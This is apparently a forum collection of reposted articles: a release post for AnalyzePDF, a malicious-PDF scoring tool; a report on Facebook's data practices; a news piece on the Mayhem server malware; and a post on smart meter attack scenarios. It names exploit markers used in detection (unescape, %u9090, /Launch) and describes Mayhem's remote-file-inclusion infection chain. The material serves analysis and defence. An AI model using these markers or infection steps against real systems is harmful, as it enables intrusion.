in your analysis process. It has some intelligence built into it to flag on things and also allows one to decode things like JavaScript from the current shell. Even though it has a batch/automated mode to it, it still feels like more of a tool that I want to use to analyze a single PDF at a time and dig deep into the files internals. Originally, this tool didn't look match keywords if they had spaces after them but it was a quick and easy fix... glad this testing could help improve another users work. [h=4]PDFStreamDumper[/h] PDFStreamDumper is a great tool with many sweet features but it has its uses and limitations like all things. It's a GUI and built for analysis on Windows systems which is fine but it's power comes from analyzing a single PDF at a time - and again, it's still mostly a manual process. [h=4]pdfxray/pdfxray_lite[/h] Pdfxray was originally an online tool but Brandon created a lite version so it could be included in REMnux (used to be publicly accessible but at the time of writing this looks like that might have changed). If you look back at some of Brandon's work historically he's also done a lot in this space as well and since I encountered some issues with other tools and noticed he did as well in the past I know he's definitely dug deep and used that knowledge for his tools. Pdfxray_lite has the ability to query VirusTotal for the file's hash and produce a nice HTML report of the files structure - which is great if you want to include that into an overall report but again this requires the user to interpret the parsed data [h=4]pdfcop[/h] Pdfcop is part of the Origami framework. 
There're some really cool tools within this framework but I liked the idea of analyzing a PDF file and alerting on badness. This particular tool in the framework has that ability, however, I noticed that if it flagged on one cause then it wouldn't continue analyzing the rest of the file for other things of interest (e.g. - I've had it close the file our right away if there was an invalid Xref without looking at anything else. This is because PDF's are read from the bottom up meaning their Xref tables are first read in order to determine where to go next). I can see the argument of saying why continue to analyze the file if it already was flagged bad but I feel like that's too much of tunnel vision for me. I personally prefer to know more than less...especially if I want to do trending/stats/analytics. [h=2]So why create something new?[/h] While there are a wealth of PDF analysis tools these days, there was a noticeable gap of tools that have some intelligence built into them in order to help automate certain checks or alert on badness. In fairness, some (try to) detect exploits based on keywords or flag suspicious objects based on their contents/names but that's generally the extent of it. I use a lot of those above mentioned tools when I'm in the situation where I'm handed a file and someone wants to know if it's malicious or not... but what about when I'm not around? What if I'm focused/dedicated to something else at the moment? What if there's wayyyy too many files for me to manually go through each one? Those are the kinds of questions I had to address and as a result I felt I needed to create something new. Not necessarily write something from scratch... I mean why waste that time if I can leverage other things out there and tweak them to fit my needs? [h=3]Thought Process[/h] What do people typically do when trying to determine if a PDF file is benign or malicious? Maybe scan it with A/V and hope something triggers, run it through a sandbox and hope the right conditions are met to trigger or take them one at a time through one of the above mentioned tools? They're all fine work flows but what if you discover something unique or come across it enough times to create a signature/rule out of so you can trigger on it in the future? We tend to have a lot to remember so doing the analysis one offs may result in us forgetting something that we previously discovered. Additionally, this doesn't scale too great in the sense that everyone on your team might not have the same knowledge that you do... so we need some consistency/intelligence built in to try and compensate for these things.< I felt it was better to use the characteristics of a malicious file (either known or observed from combinations of within malicious files) to eval what would indicate a malicious file. Instead of just adding points for every questionable attribute observed. e.g. - instead of adding a point for being a one page PDF, make a condition to say if you see an invalid xref and a one page PDF then give it a score of X. This makes the conditions more accurate in my eyes; since, for example: A single paged PDF by itself isn't malicious but if it also contains other things of question then it should have a heavier weight of being malicious. Another example is JavaScript within a PDF. While statistics show JavaScript within a PDF are a high indicator that it's malicious, there're still legitimate reasons for JavaScript to be within a PDF (e.g. 
- to calculate a purchase order form or verify that you correctly entered all the required information the PDF requires). [h=3]Gathering Stats[/h] At the time I was performing my PDF research and determining how I wanted to tackle this task I wasn't really aware of machine learning. I feel this would be a better path to take in the future but the way I gathered my stats/data was in a similar (less automated/cool AI) way. There's no shortage of PDF's out there which is good for us as it can help us to determine what's normal, malicious, or questionable and leverage that intelligence within a tool. If you need some PDF's to gather some stats on, contagio has a pretty big bundle to help get you started. Another resource is Govdocs from Digital Corpora ... or a simple Google dork. Note : Spidering/downloading these will give you files but they still need to be classified as good/bad for initial testing). Be aware that you're going to come across files that someone may mark as good but it actually shows signs of badness... always interesting to detect these types of things during testing! [h=4]Stat Gathering Process[/h] So now that I have a large set of files, what do I do now? I can't just rely on their file extensions or someone else saying they're malicious or benign so how about something like this: Verify it's a PDF file. When reading through the PDF specs I noticed that the PDF header can be within the first 1024 bytes of the file as stated in ""3.4.1, 'File Header' of Appendix H - ' Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.'"... that's a long way down compared to the traditional header which is usually right in the beginning of a file. So what's that mean for us? Well if we rely solely on something like file or TRiD they _might_ not properly identify/classify a PDF that has the header that far into the file as most only look within the first 8 bytes (unfair example is from corkami). We can compensate for this within our code/create a YARA rule etc.... you don't believe me you say? Fair enough, I don't believe things unless I try them myself either: The file to the left is properly identified as a PDF file but when I created a copy of it and modified it so the header was a bit lower, the tools failed. The PDF on the right is still in accordance with the PDF specs and PDF viewers will still open it (as shown)... so this needs to be taken into consideration. [*]Get rid of duplicates (based on SHA256 hash) for both files in the same category (clean vs. dirty) then again via the entire data set afterwards to make sure there're no duplicates between the clean and dirty sets. [*]Run pdfid & pdfinfo over the file to parse out their data. These two are already included in REMnux so I leveraged them. You can modify them to other tools but this made it flexible for me and I knew the tool would work when run on this distro; pdfinfo parsed some of the data better during tests so getting the best of both of them seemed like the best approach. [*]Run scans for low hanging fruit/know badness with local A/V||YARA Now that we have a more accurate data set classified: [*]Are all PDFs classified as benign really benign? [*]Are all PDFs classified as malicious really malicious? 
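As an aside, the "header somewhere in the first 1024 bytes" quirk mentioned in the verification step above is easy to check for yourself. A minimal sketch (mine, not the AnalyzePDF code itself):

#!/usr/bin/env python
# Look for the %PDF-M.N header anywhere in the first 1024 bytes, since the spec
# only requires it to appear somewhere in that range (not at offset 0).
import re
import sys

def pdf_header(path):
    with open(path, "rb") as f:
        head = f.read(1024)
    m = re.search(br"%PDF-(\d+\.\d+)", head)
    if m is None:
        return None, None
    return m.start(), m.group(1).decode("ascii", "replace")

if __name__ == "__main__":
    offset, version = pdf_header(sys.argv[1])
    if offset is None:
        print("No PDF header found in the first 1024 bytes")
    else:
        print("PDF header at offset %d, version %s" % (offset, version))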
[h=3]Stats[/h]

Files analyzed (no duplicates found between clean & dirty):

Class  Type      Count
Dirty  Pre-Dup   22,342
Dirty  Post-Dup  11,147
Clean  Pre-Dup    2,530
Clean  Post-Dup   2,529
Total Files Analyzed: 13,676

I've collected more than enough data to put together a paper or presentation but I feel that's been played out already, so if you want more than what's outlined here just ping me. Instead of dragging this post on for a while showing each and every stat that was pulled, I feel it might be more useful to show a high-level comparison of what was detected the most in each set and some anomalies.

[h=4]Ah-Ha's[/h]

None of the clean files had incorrect file headers/versions
There wasn't a single keyword/attribute parsed from the clean files that covered more than 4.55% of its entire data set class. This helps show the uniqueness of these files vs. malicious actors reusing things.
The dates within the clean files were generally unique while the date fields on the dirty files were more clustered together - again, reuse?
None of the values for the keywords/attributes of the clean files were flagged as trying to be obfuscated by pdfid
Clean files never had '/Colors > 2^24' above 0 while some dirty files did
Rarely did a clean file have a high count of JavaScript in it while dirty files ranged from 5-149 occurrences per file
'/JBIG2Decode' was never above '0' in any clean file
'/Launch' wasn't used much in either of the data sets but still more common in the dirty ones
Dirty files have far more characters after the last %%EOF (starting from 300+ characters is a good check)
Single page PDF's have a higher likelihood of being malicious - no duh
'/OpenAction' is far more common in malicious files

[h=4]YARA signatures[/h]

I've also included some PDF YARA rules that I've created as a separate file so you can use those to get started. YARA isn't really required but I'm making it that way for the time being because it's helpful... so I have the default rules location pointing to REMnux's copy of MACB's rules unless otherwise specified.

Clean data set:
Dirty data set:
Signatures that triggered across both data sets:

Cool... so we know we have some rules that work well and others that might need adjusting, but they still help!

[h=4]What to look for[/h]

So we have some data to go off of... what are some additional things we can take away from all of this and incorporate into our analysis tool so we don't forget about them and/or stop repetitive steps?

Header
In addition to being after the first 8 bytes, I found it useful to look at the specific version within the header. This should normally look like "%PDF-M.N." where M.N is the Major/Minor version... however, the above-mentioned 'low header' needs to be looked for as well. Knowing this we can look for invalid PDF version numbers, or digging deeper we can correlate the PDF's features/elements to the version number and flag on mismatches.
Here're some examples of what I mean, and more reasons why reading those dry specs are useful: If FlateDecode was introduced in v1.2 then it shouldn't be in any version below If JavaScript and EmbeddedFiles were introduced in v1.3 then they shouldn't be in any version below If JBIG2 was introduced in v1.4 then it shouldn't be in any version below [*]Body This is where all of the data is (supposed to be) stored; objects (strings, names, streams, images etc.). So what kinds of semi-intelligent things can we do here? Look for object/stream mismatches. e.g - Indirect Objects must be represented by 'obj' and 'endobj' so if the number of 'obj' is different than the number of 'endobj' mentions then it might be something of interest Are there any questionable features/elements within the PDF? JavaScript doesn't immediately make the file malicious as mentioned earlier, however, it's found in ~90% of malicious PDF's based on others and my own research. '/RichMedia' - indicates the use of Flash (could be leveraged for heap sprays) '/AA', '/OpenAction', '/AcroForm' - indicate that an automatic action is to be performed (often used to execute JavaScript) '/JBIG2Decode', '/Colors' - could indicate the use of vulnerable filters; Based on the data above maybe we should look for colors with a value greater than 2^24 '/Launch', '/URL', '/Action', '/F', '/GoToE', '/GoToR' - opening external programs, places to visit and redirection games Obfuscation Multiple filters ('/FlateDecode', '/ASCIIHexDecode', '/ASCII85Decode', '/LZWDecode', '/RunLengthDecode') The streams within a PDF file may have filters applied to them (usually for compressing/encoding the data). While this is common, it's not common within benign PDF files to have multiple filters applied. This behavior is commonly associated with malicious files to try and thwart A/V detection by making them work harder. Separating code over multiple objects Placing code in places it shouldn't be (e.g. - Author, Keywords etc.) White space randomization Comment randomization Variable name randomization String randomization Function name randomization Integer obfuscation Block randomization Any suspicious keywords that could mean something malicious when seen with others? eval, array, String.fromCharCode, getAnnots, getPageNumWords, getPageNthWords, this.info, unescape, %u9090 [*]Xref The first object has an ID 0 and always contains one entry with generation number 65535. This is at the head of the list of free objects (note the letter ‘f’ that means free). The last object in the cross reference table uses the generation number 0. Translation please? Take a look a the following Xref: Knowing how it's supposed to look we can search for Xrefs that don't adhere to this structure. [*]Trailer Provides the offset of the Xref (startxref) Contains the EOF, which is supposed to be a single line with "%%EOF" to mark the end of the trailer/document. Each trailer will be terminated by these characters and should also contain the '/Prev' entry which will point to the previous Xref. Any updates to the PDF usually result in appending additional elements to the end of the file This makes it pretty easy to determine PDF's with multiple updates or additional characters after what's supposed to be the EOF [*]Misc. Creation dates (both format and if a particular one is known to be used) Title Author Producer Creator Page count [h=2]The Code[/h] So what now? We have plenty of data to go on - some previously known, but some extremely new and helpful. 
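A few of the "what to look for" items above translate almost directly into code. The following is a rough sketch (mine, not the AnalyzePDF implementation); the keyword matching is naive, ignores name obfuscation, and the 300-byte threshold simply comes from the stats earlier in the post:

#!/usr/bin/env python
# Quick structural checks: obj/endobj balance, data after the final %%EOF,
# and features that should not exist in the PDF version claimed by the header.
import re
import sys

# PDF version in which each feature was introduced.
INTRODUCED_IN = {
    b"/FlateDecode": 1.2,
    b"/JavaScript": 1.3,
    b"/EmbeddedFiles": 1.3,
    b"/JBIG2Decode": 1.4,
}

def quick_checks(path):
    with open(path, "rb") as f:
        data = f.read()
    findings = []

    # Every indirect object should have a matching 'obj' / 'endobj' pair.
    n_obj = len(re.findall(br"\bobj\b", data))   # \b keeps 'endobj' from matching here
    n_endobj = data.count(b"endobj")
    if n_obj != n_endobj:
        findings.append("obj/endobj mismatch: %d vs %d" % (n_obj, n_endobj))

    # Characters after the last %%EOF (300+ was a useful dirty indicator).
    eof = data.rfind(b"%%EOF")
    if eof == -1:
        findings.append("no EOF marker at all")
    else:
        trailing = len(data) - (eof + 5)
        if trailing > 300:
            findings.append(str(trailing) + " bytes after the final EOF marker")

    # Header version vs. features that did not exist in that version.
    m = re.search(br"%PDF-(\d+\.\d+)", data[:1024])
    if m is None:
        findings.append("no PDF header in the first 1024 bytes")
    else:
        version = float(m.group(1).decode("ascii", "replace"))
        for keyword, needs in INTRODUCED_IN.items():
            if keyword in data and version < needs:
                findings.append("%s present but header claims %.1f" % (keyword.decode("ascii"), version))
    return findings

if __name__ == "__main__":
    for finding in quick_checks(sys.argv[1]):
        print(finding)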
It's one thing to know that most files with JavaScript or that are (1) page have a higher tendency of being malicious... but what about some of the other characteristics of these files? By themselves, a single keyword/attribute might not stick out that much but what happens when you start to combine them together? Welp, hang on because we're going to put this all together. [h=3]File Identification[/h] In order to account for the header issue, I decided the tool itself would look within the first 1024 bytes instead of relying on other file identification tools: Another way, so this could be detected whether this tool was used or not, was to create a YARA rule such as: [h=3]Wrap pdfinfo[/h] Through my testing I found this tool to be more reliable in some areas as opposed to pdfid such as: Determining if there're any Xref errors produced when trying to read the PDF Look for any unterminated hex strings etc. Detecting EOF errors [h=3]Wrap pdfid[/h] Read the header. *pdfid will show exactly what's there and not try to convert it* _attempt_ to determine the number of pages Look for object/stream mismatches Not only look for JavaScript but also determine if there's an abnormally high amount Look for other suspicious/commonly used elements for malicious purposes (AcroForm, OpenAction, AdditionalAction, Launch, Embedded files etc.) Look for data after EOF Calculate a few different entropy scores Next, perform some automagical checks and hold on to the results for later calculations. [h=3]Scan with YARA[/h] While there are some pre-populated conditions that score a ranking built into the tool already, the ability to add/modify your own is extremely easy. Additionally, since I'm a big fan of YARA I incorporated it into this as well. There're many benefits of this such as being able to write a rule for header evasion, version number mismatching to elements or even flagging on known malicious authors or producers. The biggest strength, however, is the ability to add a 'weight' field in the meta section of the YARA rules. What this does is allow the user to determine how good of a rule it is and if the rule triggers on the PDF, then hold on to its weighted value and incorporate it later in the overall calculation process which might increase it's maliciousness score. Here's what the YARA parsing looks like when checking the meta field: And here's another YARA rule with that section highlighted for those who aren't sure what I'm talking about: If the (-m) option is supplied then if _any_ YARA rule triggers on the PDF file it will be moved to another directory of your choosing. This is important to note because one of your rules may hit on the file but it may not be displayed in the output, especially if it doesn't have a weight field. Once the analysis has completed the calculation process starts. This is two phase - Anything noted from pdfino and pdfid are evaluated against some pre-determined combinations I configured. These are easy enough to modify as needed but they've been very reliable in my testing...but hey, things change! Instead of moving on once one of the combination sets is met I allow the scoring to go through each one and add the additional points to the overall score, if warranted. This allows several 'smaller' things to bundle up into something of interest rather than passing them up individually. Any YARA rule that triggered on the PDF file has it's weighted value parsed from the rule and added to the overall score. 
This helps bump up a file's score or immediately flag it as suspicious if you have a rule you really want to alert on. So what's it look like in action? Here's a picture I tweeted a little while back of it analyzing a PDF exploiting CVE-2013-0640:

[h=3]Download[/h]

I've had this code for quite a while and haven't gotten around to writing up a post to release it with, but after reading a former coworker's blog post last night I realized it was time to just write something up and get this out there, as there are still people asking for something that employs some of the capabilities (e.g. - weight ranking). Is this 100% right all the time? No... let's be real. I've come across situations where a file that was benign was flagged as malicious based on its characteristics, and that's going to happen from time to time. Not all PDF creators adhere to the required specifications and some users think it's fun to embed or add things to PDF's when it's not necessary. What this helps to do is give a higher ranking to files that require closer attention, or help someone determine if they should open a file right away vs. send it to someone else for analysis (e.g. - deploy something like this on a web server somewhere and let the user upload their questionable file to it and get back a "yes it's ok" -or- "no, sending it for analysis").

AnalyzePDF can be downloaded on my github

[h=2]Further Reading[/h]

Research papers (one | two | three)
[PDF] PDFTricks
PDF Overview

Posted by hiddenillusion at 9:44 PM

Sursa: :: hiddenillusion ::: AnalyzePDF - Bringing the Dirt Up to the Surface
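As a rough illustration of the weighted-YARA idea described in the post (again, a sketch of mine rather than AnalyzePDF's own code), the yara-python module can pull a numeric 'weight' value out of each matching rule's meta section and fold it into an overall score; rules without a weight simply contribute nothing:

#!/usr/bin/env python
# Sum the 'weight' meta field of every YARA rule that fires on a file.
# Assumes rules declare something like:  meta: weight = 3
import sys
import yara

def weighted_score(rules_path, target_path):
    rules = yara.compile(filepath=rules_path)
    score = 0
    for match in rules.match(target_path):
        weight = match.meta.get("weight", 0)
        print("rule %-30s weight %s" % (match.rule, weight))
        score += int(weight)
    return score

if __name__ == "__main__":
    print("total weighted score: %d" % weighted_score(sys.argv[1], sys.argv[2]))

Keeping the weights inside the rules themselves means an analyst can tune how suspicious a given signature is without ever touching the scanning code.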
-
Didn't Read Facebook's Fine Print? Here's Exactly What It Says The Huffington Post | By Amanda Scherker So, like every other one of the world's 1.28 billion monthly active Facebook users, you blindly agreed to Facebook's Terms and Conditions without reading the fine print. You entrusted your photo albums, private messages and relationships to a website without reading its policies. And you do the same with every other site ... sound about right? In your defense, Carnegie Mellon researchers determined that it would take the average American 76 work days to read all the privacy policies they agreed to each year. So you're not avoiding the reading out of laziness; it's literally an act of job preservation. So here are the Cliffs Notes of what you agreed to when you and Facebook entered into this contract. Which, by the way, began as soon as you signed up: Nothing you do on Facebook is private. Repeat: Nothing you do on Facebook is private. Note the rather vague use of the word "infer," which Oxford Dictionary defines as "Deduce or conclude (information) from evidence and reasoning rather than from explicit statements." That includes some things you haven't even done yet. Facebook has even begun studying messages that you type but end up deciding not to post. A recent study by a Facebook data analyst looked at habits of 3.9 million English-speaking Facebook users to analyze how different users "self-censor" on Facebook. They measured the frequency of "aborted" messages or status posts, i.e., posts that were deleted before they ever were published. They studied this because "[Facebook] loses value from the lack of content generation," and they hoped to determine how to limit this kind of self-censorship in the future. While a Facebook spokesman told Slate that the network is not monitoring the actual substance of these messages, Facebook was able to determine when characters were typed, and whether they were posted within ten minutes of being typed. Even if you leave the network, not all your information does. Your Facebook footprint doesn't necessarily disappear if you deactivate your account. According to the site's Statement of Rights and Responsibilities, if your videos or photos have been shared by other users, they will remain visible on the site after you deactivate your account, and are subject to that user's privacy settings. Your information lets Facebook sell the power of your profile to brands and companies. This means that Facebook is being paid for supplying your endorsement (which you indicate by liking a page) to brands or companies. You can even find out how much your data is worth to Facebook by using the FBME application from Disconnect, Inc. And a report from The Center For Digital Democracy shows marketing companies are taking note, creating algorithms for determining key social media "influencers." The report found that many marketers have identified multicultural youth users as key influencers, and have targeted those demographics with heavier social media marketing. You're also giving Facebook the ability to track your web surfing anytime you're logged into the site. This announcement came in a recent post from Facebook. Facebook notes that other websites do the same thing. But that accounts for an insane amount of potential data, especially given the growth of Facebook mobile use. On average, Facebook mobile users check the site 14 times a day on their devices. Facebook also uses strategic partnerships to track your purchases in real life. 
Last year, Facebook started partnering with data broker firms. Data brokers earn their money by selling the power of your consumer habits and monitoring your online and offline spending. Facebook's partnership allows them to measure the correlation between the ads you see on Facebook and the purchases you make in-store -- and determine whether you're actually buying in real life the things you're seeing digitally while using Facebook. Two of Facebook's partners, Datalogix and Acxiom -- one of the oldest data brokers and a partner of Huffington Post's parent company AOL, Inc., -- were among the nine data brokers the Federal Trade Commission analyzed in a recent in-depth study. The study found that data brokers "collect consumer data from numerous sources, largely without consumers' knowledge" and "store billions of data elements." Acxiom has a database of about 3,000 data segments for nearly every U.S. consumer. Brokers share this information among "multiple layers of data brokers providing data to each other," and then analyze the date to make "potentially sensitive inferences" about the consumer. These sensitive data points could range from health specifics, like high cholesterol, to broader demographic categories -- like the so-called "Urban Scramble," which includes a "high concentration of Latinos and African Americans with low incomes" or the so-called "Rural Everlasting," which includes single men and women over the age of 66 with “low educational attainment and low net worths." Some other examples of data points the FTC noted: Presence of Elderly Parent Presence of Children in Household Birth Dates of Each Child in House Single Parent with Children Ethnic and Religious Affiliations Home Size Market Value Date of Move Gambling - State Lotteries Affluent Baby Boomer Type of Credit Cards Date of Last Travel Purchase Buying Activity Working-Class Mom Buying Channel Preference (e.g., Internet, Mail, Phone) Average Days Between Orders Last Online Order Date Last Offline Order Date Smoker in Household Allergy Sufferer Weight Loss & Supplements Expectant Parent The data collection is difficult to skirt. One Time Magazine reporter went to great lengths to hide her pregnancy from big data; she said her husband ended up looking like a criminal when he went to a drugstore and tried to purchase enough Amazon gift cards to buy a stroller on the website. This kind of ultra-specific marketing also can become eerie. Take the case of Mike Seay, who the LA Times reported received an OfficeMax marketing letter addressed to "Mike Seay, Daughter Killed in Car Crash." OfficeMax said that the information came from a third-party broker, but did not specify which one. Facebook uses all this outside information to target ads to you. This past June, Facebook announced that it would start using data from users' web browsing history to serve targeted advertisements as such: Of course, targeting ads is hardly a new phenomenon; Nielsen started gathering information about radio audiences back in the '30s. But because Facebook has so much information on every user, the kinds of demographics they make available to advertisers are more comprehensive. These are some of the ad target categories that Facebook allows: For example, a company could specify its audience, said Facebook, "to target people who recently moved and are engaged or in a relationship and in the industries of Accounting and Finance." 
When Facebook introduced its ad targeting, it said, "When we ask people about our ads, one of the top things they tell us is that they want to see ads that are more relevant to their interests." But that explanation doesn't really tell the whole story. While some users may not mind being shown targeted ads to help them pick out a new TV, this example brushes over the full scope of items being marketed to you based on your data. For instance, according to a report from the Center for Digital Democracy, financial service companies have taken to Facebook for "data mining, targeting, and influencing consumers and their networks of friends," and some companies are developing "new leads for their loan and refinance offers" based on users' Facebook behavior. And the finance world is not a small amount of Facebook's advertising platform: According to a Business Insider investigation, Visa, American Express, Capitol One and CitiBank are among the top 35 biggest advertisers on Facebook. When Facebook describes its newly implemented changes, it doesn't seem as eager to discuss the financial plans it might be helping the companies sell you. So who really benefits from these highly targeted ads? For one, Facebook itself. Facebook's ad revenue grew 82 percent from 2013 to the first quarter of 2014, totaling $2.27 billion. Joseph Turow, a professor at the University of Pennsylvania’s Annenberg School for Communication, told the New York Times that this new user tracking is making Facebook one of the fastest-growing advertising companies on the Internet. "It's more likely to help Facebook than you," he said. If you're not very keen on helping Facebook generate more profitable ads at the price of your privacy, Facebook suggests you choose the "x" out option on individual ads. This won't change the data being gathered about your interests, but it should help prevent an influx of credit card ads from popping up on your Facebook. If you want your targeted ads to stop completely, Facebook recommends you use the industry-standard opt-out program from Digital Advertising Alliance. However, those two recommendations have been dismissed by privacy advocates like Jeff Chester, executive director of the Center for Digital Democracy, who called them "a political smokescreen to enable Facebook to engage in more data gathering." FTC chairwoman Edith Ramirez has also urged the wider digital advertising community to create a "more persistent method" of opting out that would give consumers more control. According to a Consumer Reports poll, 85 percent of online consumers oppose Internet ad tracking. Facebook has been rolling out location services that effectively turn mobile phones into location tracking devices. What's next when it come to information gathering by Facebook? TechCrunch spotlighted Facebook's new tracking feature, "Nearby Friends," which is being pitched as an opt-in way to find out which of your friends is located within a mile of you. While you don't receive the exact location of your friends, Facebook receives your exact location. The feature uses "Location Tracking" to create your "Location History." While you can clear your history and turn off the app at will, Facebook noted that it "may still receive your most recent precise location so that you can, for example, post content that's tagged with your location or find nearby places." So some amount of tracking is happening, no matter what. And it plans to use this location data to sell you things. 
Back when Facebook unveiled "Nearby Friends" in April, a company spokesman conceded to TechCrunch that "at this time [Nearby Friends] is not being used for advertising or marketing, but in the future it will be." It wouldn't be surprising if Facebook did, indeed, begin selling location-based data to marketers. After all, studies confirm that this advertising is very successful at convincing you to buy things. A recent U.K. study conducted by media strategy company Vizeum and direct marketing agency iProspect found that location-based advertising created an "11 percent increase in store visits among more than 172,000 people that were served adverts." This technology is only going to become more sophisticated with the rise of more location-tracking apps that can follow your movements in-store. And, yes, Facebook can use you and your data for research. They say so right... Yeah... right there. Despite that "research clause," you may have been surprised to learn that Facebook experimented on nearly 700,000 Facebook users for one week in the summer of 2012. The site manipulated their News Feeds to prioritize positive or negative content, attempting to determine if emotions spread contagiously through social networks. There was no age restriction on the data, meaning it may have involved users under 18. Cornell researchers then analyzed Facebook's data. The resulting study, published in the Proceedings of the National Academy of Sciences, found that emotional states can be transferred via social networks. Company executive Sheryl Sandberg has since apologized for the study, calling it "poorly communicated." Andrew Ledvina, a former data scientist at Facebook from early 2012 to the summer of 2013, told the Wall Street Journal that Facebook did not have an internal review board monitoring research studies conducted by the data science team. He said that the team had freedom to try nearly any test it desired, so long as it didn't interfere with the user experience. He added that the sheer mass of the experiment's subjects was at times difficult to really comprehend, numbering in the hundreds of thousands of users. As he put it, "You get a little desensitized to it." Forbes points out that the "research" part of the User Data policy was not added until May 2012, while the research was conducted in January of 2012. Facebook data is potentially available to government agencies. Facebook has spoken out about U.S. government information requests it considers unconstitutional. Facebook's Deputy General Counsel Chris Sonderby published a statement last month about the site's legal fight regarding one such search warrant, in which the government requested nearly all data on 381 Facebook users. Only 62 of those searched were charged, in a disability fraud case. He noted that, "We regularly push back on requests that are vague or overly broad." But Facebook's second Global Government Requests Report showed that when the U.S. government asks, Facebook hands over at least some user data in more than 80 percent of cases: And if you actually think you know what you've agreed to, remember that Facebook maintains the right to change its mind about user conditions at any time. Basically, if you're still using Facebook, you're agreeing. After the site unveiled its new, more aggressive approach to targeted advertising in June, a Facebook spokesman told the Wall Street Journal, "We routinely discuss product and policy updates with our regulators -- the FTC and the Irish DPC -- and this time is no different. 
While we are not required to notify nor seek approval from regulators before we make changes, we do keep them informed and answer any questions they may have." It's clear that the meaning of privacy is changing drastically in the digital age. While Facebook may be one of the agents of change in drafting a new definition, it's certainly not the only one. As standards of privacy continue to morph, knowledge remains your best weapon in protecting yourself and your information. We recommend checking out the documentary "Terms And Conditions May Apply" for an in-depth look at privacy in the digital age. Common Sense Media also offers helpful guidelines for protecting your and your children's privacy online. Sursa: Didn't Read Facebook's Fine Print? Here's Exactly What It Says
-
Manic malware Mayhem spreads through Linux, FreeBSD web servers And how Google could cripple infection rate in a second By Iain Thomson, 18 Jul 2014 Malware dubbed Mayhem is spreading through Linux and FreeBSD web servers, researchers say. The software nasty uses a grab bag of plugins to cause mischief, and infects systems that are not up to date with security patches. Andrej Kovalev, Konstantin Ostrashkevich and Evgeny Sidorov, who work at Russian internet portal Yandex, discovered the malware targeting *nix servers. They traced transmissions from compromised computers to two command and control (C&C) servers. So far they have found 1,400 machines that have fallen to the code, with potentially thousands more to come. "In the *nix world, autoupdate technologies aren't widely used, especially in comparison with desktops and smartphones. The vast majority of web masters and system administrators have to update their software manually and test that their infrastructure works correctly," the trio wrote in a technical report for Virus Bulletin. "For ordinary websites, serious maintenance is quite expensive and often webmasters don't have an opportunity to do it. This means it is easy for hackers to find vulnerable web servers and to use such servers in their botnets." Mayhem spreads by finding servers hosting websites with a remote file inclusion (RFI) vulnerability – it even uses Google's /humans.txt to test for this. If the ad giant rewrote this file, specifically changing the words "we can shake", Mayhem infections would be slowed – until its rfiscan.so plugin is updated. Once the malware exploits an RFI, or some other weakness, to run a PHP script on a victim, it drops a shared object called libworker.so onto the infected system and pings its C&C servers. It then creates a hidden file system, usually called sd0, and downloads eight plugins, none of which were picked up by the VirusTotal malware scanning tool. These include a couple of brute-force password crackers targeting FTP, Wordpress and Joomla accounts – presumably to spread the malware further – and information-gathering web crawlers, one of which hunts for other sites with RFI holes. Some of the vulnerable web applications Mayhem scans for ... click for slightly larger version (Credit: Kovalev, Otrashkevich, Sidorov) The Yandex trio warn there may be other plugins in circulation, based on data found on the two cracked C&C servers. These include a tool specifically to exploit systems that haven't patched the Heartbleed vulnerability in OpenSSL. The team notes that the Mayhem code does bear several similarities to the Trololo_mod and Effusion families of malware, which target Apache and Nginx servers respectively. They recommend system administrators check their servers to make sure Mayhem's spread is limited. ® Sursa: Manic malware Mayhem spreads through Linux, FreeBSD web servers • The Register
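The indicators named in the report (the dropped libworker.so shared object and the "sd0" hidden file system) are easy to sweep a server for. Below is a minimal C sketch of such a check; the /var/www default and the dotted ".sd0" variant are assumptions added for illustration, and a hit is only a starting point for investigation, not proof of compromise.

/* Sketch: sweep a web root for the Mayhem artifacts named in the report
 * (the dropped libworker.so shared object and the "sd0" hidden file system).
 * The /var/www default and the ".sd0" variant are assumptions for
 * illustration, not published indicators. */
#define _XOPEN_SOURCE 500
#include <ftw.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

static int check_entry(const char *path, const struct stat *sb,
                       int typeflag, struct FTW *ftwbuf)
{
    const char *name = path + ftwbuf->base;      /* basename of this entry */
    (void)sb;

    if (typeflag == FTW_F &&
        (strcmp(name, "libworker.so") == 0 ||
         strcmp(name, "sd0") == 0 ||
         strcmp(name, ".sd0") == 0))
        printf("possible Mayhem artifact: %s\n", path);

    return 0;                                    /* keep walking the tree */
}

int main(int argc, char **argv)
{
    const char *root = (argc > 1) ? argv[1] : "/var/www";   /* assumed web root */

    if (nftw(root, check_entry, 16, FTW_PHYS) == -1) {
        perror("nftw");
        return 1;
    }
    return 0;
}

Run it against each vhost's document root; anything it flags still needs manual confirmation against the plugin list in the Virus Bulletin report.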
-
Smart Meter Attack Scenarios
12:51 am (UTC-7) | by Rainer Link (Senior Threat Researcher)

In our previous post, we looked at how smart meters were being introduced across multiple countries and regions, and why these devices pose security risks to their users. At its heart, a smart meter is simply… a computer. Let's look at our existing computers – whether they are PCs, smartphones, tablets, or embedded devices. Similarly, these smart meters are communicating via understood technologies: cellular connectivity, power-line networking, or the user's own Internet connection. With that in mind, we have to consider the possible threats – what could happen if a smart meter is compromised? Similarly, what are the problems that could result if the connectivity of a smart meter is disrupted? Let us see.

Perhaps the most obvious risk is simple: meter tampering. If a smart meter can be hacked, inaccurate information can be sent back to the utility, allowing an attacker to adjust the reading and resulting in an inflated bill. Let's say, for example, that you have an argument with your neighbor. In revenge, if he can access your smart meter, you might see a rather large electric bill. Of course, the bill can also change in the opposite direction. Let's say you're engaged in certain activities that require high levels of electricity… altcoin mining, for example. The biggest running cost for such an operation would be the electric bill. The smart meter could be hacked to have a lower reading – or, perhaps, in a location with time-varying electric rates, to make it look like the electricity was used at off-peak times.

What are some other threats at the local, "retail" level when it comes to smart meters? Crime gangs (with smarts) may well find uses for smart meters too. Power savings are frequently promoted as a benefit of smart meters. However, power consumption is also a good way of checking if someone is in a home or not. Let's say that a vulnerability made it easy for somebody other than the homeowner or the utility to see what the power usage was. (It could be as easy as a poorly-designed API, mobile app, or website.) The smart meter would then essentially become a giant "please rob me" sign for properly equipped thieves. Alternately, if that smart meter can be controlled remotely, you now have an excellent way to carry out extortion. Such a nice house you have there, it'd be a shame if anything bad happened to its power…

The connectivity of the smart meters can also be a security risk. Some meters use the cellular network to provide the connection to the main servers of their utility. The utility would, of course, be paying for the bills of these meters. A truly determined person could abuse this "free" phone to make calls, send text messages, even connect to the Internet. Alternately, the smart meter may use the same Internet connection as the home. This represents a potential risk: if somebody was able to hack the smart meter from the outside, then that attacker would have access to the house's internal network. This would put your own internal network at risk of attack; it would be as dangerous as letting anyone connect to your home network.
